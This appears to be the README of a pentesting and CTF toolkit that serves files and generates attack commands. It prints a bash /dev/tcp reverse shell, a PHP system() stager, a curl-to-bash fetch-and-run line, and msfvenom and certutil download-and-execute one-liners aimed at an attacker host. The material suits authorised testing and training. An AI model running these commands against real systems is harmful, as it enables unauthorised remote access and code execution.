Pentest Server Suite (PSS) is a versatile toolkit designed to aid in pentesting and CTF challenges by providing a streamlined command-line interface for various tasks. It simplifies serving and receiving files over HTTP, FTP, and SMB protocols, generates reverse shells and facilitates the creation of commands for tasks like downloading/uploading/executing files and setting up listeners.
- Serve/Receive files over:
- HTTP 🌐 (with template support)
- SMB 🔒
- FTP 📂
- Generate reverse shells:
- Create copy & paste commands for tools like netcat, socat and the most commonly used shells 🐚
- Generate commands for:
- Downloading/executing files using tools like curl 📥
- Setting up listeners with netcat, socat, etc. 🎧
- Creating msfvenom/nim shell payloads 🚀
Clone the repository and install dependencies:
apt install python3.12 python3.12-full python3.12-dev python3.12-venv -y
cd ~ && git clone https://github.com/Jnnshschl/PentestServerSuite.git pss
chmod +x ~/pss/pss.sh
ln -s ~/pss/pss.sh /usr/bin/pss
Start the server:
pss -S ./Tools/
While doing CTF's you'll come across the point of needing a reverse shell command or download/upload a file to the system or execute a script in memory using powershell. PSS makes it very easy to generate such command in a copy&paste approach:
# This assumes you have the "winPEASx64.exe" in your serve folder under windows/winpeas/
# Hint: to install winpeas using githubtools type ths following command:
# pss> githubtools add windows winpeas https://github.com/carlospolop/PEASS-ng .+\.exe
pss> launcher generate ftp/cmd-ftp-download windows/winpeas/winPEASx64.exe
# PSS is going to generate a copy&paste ready command to download the "winPEASx64.exe" using cmd.exe and ftp from the pss FTP server:
cmd.exe /c "@echo open 192.168.1.51 21>kpaowusl.txt&@echo binary>>kpaowusl.txt&@echo GET windows/winpeas/winPEASx64.exe >>kpaowusl.txt&@echo quit>>kpaowusl.txt&@ftp -A -s:kpaowusl.txt -v -i&del kpaowusl.txt"
# The same can be done for running linpeash using curl piped into /bin/bash:
# Hint: to install linpeas using githubtools type ths following command:
# pss> githubtools add linux linpeas https://github.com/carlospolop/PEASS-ng .+\.sh
pss> launcher generate http/curl-shell linux/linpeas/linpeas.sh
curl -sSL 'http://192.168.1.51/linux/linpeas/linpeas.sh' | /bin/bash
# To change shell binary or network interface type:
pss> set SHELLBIN /bin/sh
pss> set SHELLBIN /bin/zsh
pss> set LHOST 10.0.0.6
# or by NIC name
pss> set LHOST tun0
Generate a simple bash reverse shell:
pss> shell build bash/i_c
# /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'
Generate php code to launch a revese shell (shell will also be served over HTTP at http://192.168.1.5/php/system):
pss> shell set bash/i_c
pss> stager build php/system
# <?php system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.51/4711 0>&1'"); ?>
PSS comes with the ability to manage you common used tools from git repositories and github releases (more ways to come) using the gittools
and githubtools
Plugins like this:
Tools can be updates using these commands:
pss> githubtools update
pss> gtools update
Example to get every .zip file from the https://github.com/antonioCoco/RunasCs
repository realeses (unzipping will be done automatically):
# githubtools add <OPERATING_SYSTEM> <TOOL_NAME> <GITHUB_URL> <FILENAME_REGEX>
pss> githubtools add windows runascs https://github.com/antonioCoco/RunasCs/releases/tag/v1.5 .+\.zip
Example to clone the https://github.com/3ndG4me/AutoBlue-MS17-010
repository into you tools folder:
# gittools add <OPERATING_SYSTEM> <TOOL_NAME> <GIT_REPO_URL>
pss> gittools add windows https://github.com/3ndG4me/AutoBlue-MS17-010.git
PSS can utilize the msfvenom command to generate temporary executables with the configured LHOST and LPORT for you to use like this:
Example to clone the https://github.com/3ndG4me/AutoBlue-MS17-010
repository into you tools folder:
# msfv <TYPE> <OUTPUT_FORMAT>
pss> msfv windows/x64/shell_reverse_tcp exe
# command that is going to be used:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.51 LPORT=4711 -f exe -o /usr/share/tools/tmp/48593963.exe
After doing this, you could upload and run the exe using a launcher:
pss> launcher generate http/certutil-run tmp/48593963.exe
certutil.exe -urlcache -split -f "http://192.168.1.51/tmp/48593963.exe" ".\48593963.exe" && .\48593963.exe
Supported encodings: base16, base32, base64, base85, URLencoding
pss> base32 encode testSample
ORSXG5CTMFWXA3DF
pss> base32 decode ORSXG5CTMFWXA3DF
testSample
pss> url encodeall http://192.168.1.51/tmp/48593963.exe
%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65
pss> url decode %68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%31%2f%74%6d%70%2f%34%38%35%39%33%39%36%33%2e%65%78%65
http://192.168.1.51/tmp/48593963.exe